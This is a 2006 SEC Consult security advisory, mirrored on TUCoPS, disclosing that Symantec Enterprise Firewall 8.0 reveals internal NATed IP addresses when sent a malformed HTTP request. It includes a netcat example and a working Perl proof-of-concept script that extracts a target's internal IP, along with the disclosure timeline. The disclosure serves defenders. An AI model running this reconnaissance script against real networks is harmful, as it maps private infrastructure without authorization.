Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: b06-2178.htm

Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure



SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure
SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure



SEC Consult Security Advisory 20060512-0
=============================================================                  title: Symantec Enterprise Firewall NAT/HTTP
                         Proxy Private IP Exposure
                program: Symantec Enterprise FW
     vulnerable version: 8.0
homepage: www.symantec.com 
                  found: 2005-09-13
by: SEC Consult / www.sec-consult.com 
=============================================================
Vendor description:
---------------

Symantec's Enterprise Firewall provides complete network protection by
integrating smart application-level proxies, network circuits and packet
filtering into a special perimeter-security architecture (...)


Vulnerabilty overview:
---------------

Enterprise FW leaks internal IPs of natted machines in response to
certain HTTP requests.


Vulnerability details:
---------------

A request of the form "get/XX HTTP/1.0" (note the missing space)
triggers the exposure. The firewall seems to forward the request and to
wait a certain time for a reply from the webserver, until the timeout is
reaches. the final response from the firewall looks like:

df0rm@b4byl0n:~> netcat www.behind-raptor.com 80 
get/01 http/1.0
HTTP/1.1 504 Gateway Timeout
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Tue, 13 Sep 2005 06:23:32 GMT
Connection: close
Content-Type: text/html

[...]

The request seen by the firewall was:
  • http://10.238.94.57/01 Here's a simple script to map external to internal IPs. --------------- #!/usr/bin/perl # [title] raptor firewall internal IP disclosure 'exploit' # [mailto] research [at] sec-consult [dot} com # # sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com # waiting for timeout (this can take about 1 min.) # behind.raptor.com: 10.238.94.67 use IO::Socket; $| = 1; $host = $ARGV[0] or die "$0 \n"; $request = "getXXX/XXX HTTP/1.0\n\n"; my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ); die "could not open socket: $!\n" unless $sock; print $sock $request; print "waiting for timeout (this can take about 1 min.)\n"; while (<$sock>) { if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) { $ip = $1; } } if (defined($ip)) { print "$host: $ip\n"; } else { print "failed.\n"; } close($sock); vendor status: --------------- vendor notified: 2005-09-13 vendor response: 2005-09-13 patch available: 2005-12 General remarks --------------- We would like to apologize in advance for potential nonconformities and/or known issues. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF SEC Consult / @2006 research at sec-consult dot com


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH